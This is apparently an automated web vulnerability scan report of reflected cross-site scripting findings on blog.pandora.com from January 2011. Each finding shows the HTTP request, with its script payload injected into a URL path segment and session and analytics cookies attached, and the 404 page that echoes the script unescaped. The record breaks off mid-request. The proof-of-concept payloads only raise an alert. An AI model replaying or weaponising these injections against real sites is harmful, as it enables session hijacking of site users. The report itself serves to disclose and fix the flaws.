The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aecb2<script>alert(1)</script>bbd3bee6ead was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesaecb2<script>alert(1)</script>bbd3bee6ead/illinois/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesaecb2<script>alert(1)</script>bbd3bee6ead/illinois/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37ffe<script>alert(1)</script>8413af64462 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/illinois37ffe<script>alert(1)</script>8413af64462/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 350 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/illinois37ffe<script>alert(1)</script>8413af64462/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba293<script>alert(1)</script>35298219914 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraba293<script>alert(1)</script>35298219914/archives/images/map.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraba293<script>alert(1)</script>35298219914/archives/images/map.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11e99<script>alert(1)</script>0ea477101ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives11e99<script>alert(1)</script>0ea477101ec/images/map.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives11e99<script>alert(1)</script>0ea477101ec/images/map.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6f474<script>alert(1)</script>abd6920173d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/images6f474<script>alert(1)</script>abd6920173d/map.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/images6f474<script>alert(1)</script>abd6920173d/map.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4bae<script>alert(1)</script>09286fec01b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/images/map.htmlb4bae<script>alert(1)</script>09286fec01b HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/images/map.htmlb4bae<script>alert(1)</script>09286fec01b was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c18ce<script>alert(1)</script>7ecc04df193 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorac18ce<script>alert(1)</script>7ecc04df193/archives/indiana/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorac18ce<script>alert(1)</script>7ecc04df193/archives/indiana/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8819<script>alert(1)</script>89fc3a9ebb4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf8819<script>alert(1)</script>89fc3a9ebb4/indiana/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf8819<script>alert(1)</script>89fc3a9ebb4/indiana/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6554d<script>alert(1)</script>6f5884afdfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/indiana6554d<script>alert(1)</script>6f5884afdfb/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/indiana6554d<script>alert(1)</script>6f5884afdfb/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd390<script>alert(1)</script>573c7e0b3bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabd390<script>alert(1)</script>573c7e0b3bc/archives/louisiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorabd390<script>alert(1)</script>573c7e0b3bc/archives/louisiana/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d4792<script>alert(1)</script>859bb1e33f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd4792<script>alert(1)</script>859bb1e33f2/louisiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesd4792<script>alert(1)</script>859bb1e33f2/louisiana/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4595a<script>alert(1)</script>14a7a2da08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/louisiana4595a<script>alert(1)</script>14a7a2da08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/louisiana4595a<script>alert(1)</script>14a7a2da08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4aa7e<script>alert(1)</script>1648ab9c938 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4aa7e<script>alert(1)</script>1648ab9c938/archives/maine/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4aa7e<script>alert(1)</script>1648ab9c938/archives/maine/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a36c6<script>alert(1)</script>9fa19fe371 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa36c6<script>alert(1)</script>9fa19fe371/maine/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 346
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa36c6<script>alert(1)</script>9fa19fe371/maine/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 32ddc<script>alert(1)</script>3ce6ddf7419 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/maine32ddc<script>alert(1)</script>3ce6ddf7419/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/maine32ddc<script>alert(1)</script>3ce6ddf7419/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b372a<script>alert(1)</script>0ef2d728dc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab372a<script>alert(1)</script>0ef2d728dc3/archives/maryland/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 350
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab372a<script>alert(1)</script>0ef2d728dc3/archives/maryland/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35554<script>alert(1)</script>d313a9d9657 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives35554<script>alert(1)</script>d313a9d9657/maryland/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives35554<script>alert(1)</script>d313a9d9657/maryland/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload efc2f<script>alert(1)</script>d3dbd7d1589 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/marylandefc2f<script>alert(1)</script>d3dbd7d1589/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/marylandefc2f<script>alert(1)</script>d3dbd7d1589/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 682e0<script>alert(1)</script>d4489f6734 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora682e0<script>alert(1)</script>d4489f6734/archives/massachusetts/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora682e0<script>alert(1)</script>d4489f6734/archives/massachusetts/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8c214<script>alert(1)</script>b8b28cef3de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8c214<script>alert(1)</script>b8b28cef3de/massachusetts/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
